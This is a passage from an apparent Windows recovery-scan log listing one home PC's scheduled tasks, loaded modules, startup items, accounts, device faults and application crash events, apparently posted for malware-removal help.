    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\NorMac\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)
    CustomCLSID: HKU\S-1-5-21-485173556-832918840-2370493585-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\NorMac\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll (Dropbox, Inc.)

    ==================== Restore Points =========================


    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2012-07-26 00:26 - 2014-10-30 09:38 - 00000027 ____A C:\WINDOWS\system32\Drivers\etc\hosts
    127.0.0.1 localhost

    ==================== Scheduled Tasks (whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

    Task: {0F8B3B22-4EA7-489F-8045-C48E18D91FA6} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
    Task: {1983858A-6EB9-4995-A988-409BF0C1868B} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-12-20] (AVAST Software)
    Task: {2769D9A0-4920-4AD7-9487-C5D5B4847B0A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
    Task: {48802F80-ED7F-430C-8645-3D1C31C0C1D1} - System32\Tasks\Open Chrome => Chrome.exe --new-window http://toolbar.avg.com/almost-done?pid=safeguard&lang=en
    Task: {5A6D7855-2CB0-44BD-88B3-1032F9F78CB9} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-485173556-832918840-2370493585-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2013-08-14] (RealNetworks, Inc.)
    Task: {5DF0BDA0-D387-4B0B-AC1E-2A7A9F53C912} - System32\Tasks\G2MUpdateTask-S-1-5-21-485173556-832918840-2370493585-1000 => C:\Users\NorMac\AppData\Local\Citrix\GoToMeeting\2130\g2mupdate.exe [2014-12-24] (Citrix Online, a division of Citrix Systems, Inc.)
    Task: {606FCEDA-6C92-4E27-9427-ED08F354ED58} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-485173556-832918840-2370493585-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2013-08-14] (RealNetworks, Inc.)
    Task: {60DCDFEB-EDCB-4A6C-BF6D-E1CA8016626A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2014-11-27] (Microsoft Corporation)
    Task: {6FFB3B73-4E27-4117-9EA3-C2FC754F573B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
    Task: {7E5D0F91-D775-4A0A-83B3-5F3D2FA6F788} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-05-10] (Google Inc.)
    Task: {8F297ACA-A8AE-4D92-AF56-46D73B58F602} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-485173556-832918840-2370493585-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
    Task: {907BBD30-74CB-40E6-AA8F-AD8005FB2A5A} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-485173556-832918840-2370493585-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2013-08-14] (RealNetworks, Inc.)
    Task: {AD9B9AED-42BA-4E4C-8632-14F0FE33165F} - System32\Tasks\{4851C7F9-7E33-46BC-8896-C0A9DCBDA153} => pcalua.exe -a C:\ProgramData\BrowserProtect\2.6.1249.132\{c16c1ccb-7046-4e5c-a2f3-533ad2fec8e8}\uninstall.exe -c /Uninstall /{15D2D75C-9CB2-4efd-BAD7-B9B4CB4BC693} /su=3c3d33e7d8853371 /um
    Task: {AE7F524C-65FC-4D54-93A4-045E7D9F1F3A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-12-12] (Piriform Ltd)
    Task: {C203381B-56CD-4040-A1DE-B48855B365C5} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-485173556-832918840-2370493585-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
    Task: {CBB23B04-EB3C-4940-BF29-43281C27A1D1} - System32\Tasks\HPCustParticipation HP Officejet Pro 8610 => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPCustPartic.exe [2014-03-06] (Hewlett-Packard Co.)
    Task: {CD6CF9B9-297B-4922-8B33-DE74C19328CC} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-05-10] (Google Inc.)
    Task: C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-485173556-832918840-2370493585-1000.job => C:\Users\NorMac\AppData\Local\Citrix\GoToMeeting\2130\g2mupdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\Open Chrome.job => c:\program files (x86)\Google\Chrome\Application\chrome.exe

    ==================== Loaded Modules (whitelisted) =============

    2012-12-19 17:57 - 2012-10-04 22:49 - 00087152 _____ () C:\WINDOWS\System32\cpwmon64.dll
    2013-08-14 14:19 - 2013-08-14 14:19 - 00039056 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
    2011-03-09 10:41 - 2011-03-09 10:41 - 01066896 _____ () C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDFME\WDFME.exe
    2011-03-09 10:41 - 2011-03-09 10:41 - 00491920 _____ () C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDSC.exe
    2013-07-13 17:02 - 2013-01-12 13:33 - 00012520 _____ () C:\Users\NorMac\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter.gadget\CoreTempReader.dll
    2013-07-13 17:02 - 2013-01-12 13:33 - 00015080 _____ () C:\Users\NorMac\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter.gadget\GetCoreTempInfoNET.dll
    2013-07-13 17:02 - 2013-01-12 13:33 - 00014056 _____ () C:\Users\NorMac\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter.gadget\SystemInfo.dll
    2013-11-14 08:12 - 2013-11-14 08:12 - 00105216 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\genie2_tray.exe
    2015-01-03 12:07 - 2015-01-03 12:07 - 02909696 _____ () C:\Program Files\AVAST Software\Avast\defs\15010301\algo.dll
    2015-01-04 08:44 - 2015-01-04 08:44 - 02909696 _____ () C:\Program Files\AVAST Software\Avast\defs\15010400\algo.dll
    2014-06-06 11:56 - 2014-04-25 13:11 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
    2014-06-06 11:56 - 2014-04-25 13:11 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
    2014-06-06 11:56 - 2014-04-25 13:11 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
    2014-06-06 11:56 - 2012-08-23 09:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
    2014-06-06 11:56 - 2012-04-03 16:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
    2010-03-05 08:24 - 2010-03-05 08:24 - 00886272 _____ () C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDFME\System.Data.SQLite.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00544817 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\libgcc_s_dw2-1.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00989805 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\libstdc++-6.dll
    2013-09-28 20:14 - 2013-09-28 20:14 - 03369922 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\icuin51.dll
    2013-09-28 20:14 - 2013-09-28 20:14 - 01978690 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\icuuc51.dll
    2013-09-28 20:14 - 2013-09-28 20:14 - 22378434 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\icudt51.dll
    2013-09-28 20:14 - 2013-09-28 20:14 - 01233408 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\platforms\qwindows.dll
    2013-12-06 03:04 - 2013-12-06 03:04 - 00465920 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\Genie.dll
    2013-12-05 06:36 - 2013-12-05 06:36 - 01547776 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\SvtNetworkTool.dll
    2013-11-10 20:59 - 2013-11-10 20:59 - 00192512 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Airprint.dll
    2013-12-05 06:37 - 2013-12-05 06:37 - 00631808 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Internet.dll
    2013-12-06 00:55 - 2013-12-06 00:55 - 04956160 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Map.dll
    2013-11-13 04:05 - 2013-11-13 04:05 - 00427520 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_NetworkProblem.dll
    2013-11-10 20:58 - 2013-11-10 20:58 - 00144896 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\DragonNetTool.dll
    2013-11-10 21:09 - 2013-11-10 21:09 - 01174528 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_ParentalControl.dll
    2013-12-05 06:31 - 2013-12-05 06:31 - 08558592 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Resource.dll
    2013-12-05 06:34 - 2013-12-05 06:34 - 01270272 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_RouterConfiguration.dll
    2013-11-10 20:59 - 2013-11-10 20:59 - 00068608 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\QRCode.dll
    2013-12-06 02:57 - 2013-12-06 02:57 - 00199680 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Statistics.dll
    2013-12-05 06:43 - 2013-12-05 06:43 - 00884736 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Ui.dll
    2013-11-10 21:21 - 2013-11-10 21:21 - 00427520 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\GeniePlugin_Wireless.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00051200 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\imageformats\qgif.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00052224 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\imageformats\qico.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00261120 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\imageformats\qjpeg.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00046080 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\imageformats\qsvg.dll
    2013-11-10 20:58 - 2013-11-10 20:58 - 00078848 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\DiagnosePlugin.dll
    2013-11-10 20:56 - 2013-11-10 20:56 - 00140288 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\DiagnoseDll.dll
    2013-11-10 20:56 - 2013-11-10 20:56 - 00072192 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\SVTUtils.dll
    2013-11-10 20:56 - 2013-11-10 20:56 - 00074752 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\NetcardApi.dll
    2013-11-10 20:56 - 2013-11-10 20:56 - 00136704 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\airprintdll.dll
    2013-12-05 06:43 - 2013-12-05 06:43 - 00641536 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\InnerPlugin_Update.dll
    2013-11-10 21:24 - 2013-11-10 21:24 - 00458752 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\InnerPlugin_WirelessExport.dll
    2013-11-10 21:23 - 2013-11-10 21:23 - 00046080 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\WSetupApiPlugin.dll
    2013-11-10 20:56 - 2013-11-10 20:56 - 00066560 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\WSetupDll.dll
    2013-09-28 20:13 - 2013-09-28 20:13 - 00040960 _____ () C:\Program Files (x86)\NETGEAR Genie\bin\printsupport\windowsprintersupport.dll
    2014-12-20 10:57 - 2014-12-20 10:57 - 38562088 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
    2013-02-13 19:55 - 2013-02-13 19:55 - 00755712 _____ () C:\WINDOWS\assembly\GAC_32\System.Data.SQLite\1.0.56.0__28c9bcd4dddc48a1\System.Data.SQLite.dll
    2013-02-13 19:55 - 2013-02-13 19:55 - 00471040 _____ () C:\WINDOWS\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\4.0.114.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll
    2013-02-13 14:10 - 2013-02-13 14:10 - 00854016 _____ () C:\WINDOWS\assembly\GAC_32\System.Data.SQLite\1.0.61.0__db937bc2d44ff139\System.Data.SQLite.dll
    2013-02-13 14:10 - 2013-02-13 14:10 - 00471040 _____ () C:\WINDOWS\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.104.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll
    2012-11-29 16:59 - 2012-11-29 16:59 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
    2014-12-12 23:14 - 2014-12-05 20:50 - 01077064 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\libglesv2.dll
    2014-12-12 23:14 - 2014-12-05 20:50 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\libegl.dll
    2014-12-12 23:14 - 2014-12-05 20:50 - 09009480 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\pdf.dll
    2014-12-12 23:14 - 2014-12-05 20:50 - 01677128 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\ffmpegsumo.dll
    2014-12-12 23:14 - 2014-12-05 20:50 - 14913352 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.95\PepperFlash\pepflashplayer.dll

    ==================== Alternate Data Streams (whitelisted) =========

    (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

    AlternateDataStreams: C:\Users\NorMac\AppData\Roaming\Tab Separated Values (Windows).EML:OECustomProperty

    ==================== Safe Mode (whitelisted) ===================

    (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MZA => ""="service"

    ==================== EXE Association (whitelisted) =============

    (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


    ==================== MSCONFIG/TASK MANAGER disabled items =========

    (Currently there is no automatic fix for this section.)

    HKLM\...\StartupApproved\StartupFolder: => "WDDMStatus.lnk"
    HKLM\...\StartupApproved\StartupFolder: => "QuickBooks Update Agent.lnk"
    HKLM\...\StartupApproved\Run32: => "HP Software Update"
    HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
    HKLM\...\StartupApproved\Run32: => "TkBellExe"
    HKLM\...\StartupApproved\Run32: => "APSDaemon"
    HKLM\...\StartupApproved\Run32: => "QuickTime Task"
    HKLM\...\StartupApproved\Run32: => "WD Quick View"
    HKLM\...\StartupApproved\Run32: => "iTunesHelper"
    HKLM\...\StartupApproved\Run32: => "Intuit SyncManager"
    HKLM\...\StartupApproved\Run32: => "LTCM Client"
    HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\StartupFolder: => "eFax 4.4.lnk"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\StartupFolder: => "HMA Pro VPN 2.0.lnk"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\Run: => "HP Officejet Pro 8600 (NET)"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\Run: => "eFax 4.4"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\Run: => "CCleaner Monitoring"
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\StartupApproved\Run: => "EssentialPIM"

    ========================= Accounts: ==========================

    Administrator (S-1-5-21-485173556-832918840-2370493585-500 - Administrator - Disabled)
    Guest (S-1-5-21-485173556-832918840-2370493585-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-485173556-832918840-2370493585-1002 - Limited - Enabled)
    NorMac (S-1-5-21-485173556-832918840-2370493585-1000 - Administrator - Enabled) => C:\Users\NorMac

    ==================== Faulty Device Manager Devices =============

    Name: Microsoft PS/2 Mouse
    Description: Microsoft PS/2 Mouse
    Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
    Manufacturer: Microsoft
    Service: i8042prt
    Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
    Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
    Devices stay in this state if they have been prepared for removal.
    After you remove the device, this error disappears.Remove the device, and this error should be resolved.

    Name: Officejet J6400 series
    Description: Officejet J6400 series
    Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
    Manufacturer: HP
    Service:
    Problem: : This device is disabled. (Code 22)
    Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

    Name:
    Description:
    Class Guid:
    Manufacturer:
    Service:
    Problem: : The drivers for this device are not installed. (Code 28)
    Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

    Name:
    Description:
    Class Guid:
    Manufacturer:
    Service:
    Problem: : The drivers for this device are not installed. (Code 28)
    Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

    Name: Officejet J6400 series
    Description: Officejet J6400 series
    Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
    Manufacturer: HP
    Service: StillCam
    Problem: : This device is disabled. (Code 22)
    Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (01/04/2015 09:13:45 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x50ecdcd3
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061233
    Faulting process id: 0x2ec4
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 09:02:47 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010a55f
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x3928
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:56:10 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010a55f
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x3594
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:47:35 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x505a96c3
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x654
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:45:39 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010888a
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x0005811c
    Faulting process id: 0x3238
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:40:20 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010888a
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x261c
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:39:22 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010888a
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x380c
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:38:40 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x50109188
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x3788
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:30:08 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x50109de9
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x40
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5

    Error: (01/04/2015 08:29:15 AM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: iexplore.exe, version: 10.0.9200.17183, time stamp: 0x5010a64a
    Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
    Exception code: 0xc0000005
    Fault offset: 0x00061206
    Faulting process id: 0x2970
    Faulting application start time: 0xiexplore.exe0
    Faulting application path: iexplore.exe1
    Faulting module path: iexplore.exe2
    Report Id: iexplore.exe3
    Faulting package full name: iexplore.exe4
    Faulting package-relative application ID: iexplore.exe5


    System errors:
    =============
    Error: (01/03/2015 11:34:16 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:11:03 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:04:52 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:04:20 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:03:48 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:03:13 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:02:40 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:02:07 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:01:34 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

    Error: (01/03/2015 11:01:02 PM) (Source: DCOM) (EventID: 10010) (User: LEVIATHON)
    Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}


    Microsoft Office Sessions:
    =========================
    Error: (12/31/2014 10:13:36 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 9915 seconds with 540 seconds of active time. This session ended with a crash.

    Error: (12/19/2014 00:19:58 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 68031 seconds with 2220 seconds of active time. This session ended with a crash.

    Error: (11/11/2014 00:17:42 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 766754 seconds with 9660 seconds of active time. This session ended with a crash.

    Error: (10/30/2014 08:57:42 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 232690 seconds with 11580 seconds of active time. This session ended with a crash.

    Error: (08/06/2014 09:20:19 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 43925 seconds with 1920 seconds of active time. This session ended with a crash.

    Error: (07/31/2014 01:50:22 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 1115 seconds with 420 seconds of active time. This session ended with a crash.

    Error: (07/25/2014 01:35:22 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 277794 seconds with 7680 seconds of active time. This session ended with a crash.

    Error: (07/22/2014 08:25:18 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 87246 seconds with 660 seconds of active time. This session ended with a crash.

    Error: (07/16/2014 10:16:04 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 27085 seconds with 1980 seconds of active time. This session ended with a crash.

    Error: (07/16/2014 02:05:38 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 529236 seconds with 21420 seconds of active time. This session ended with a crash.


    CodeIntegrity Errors:
    ===================================
    Date: 2014-10-30 10:34:04.886
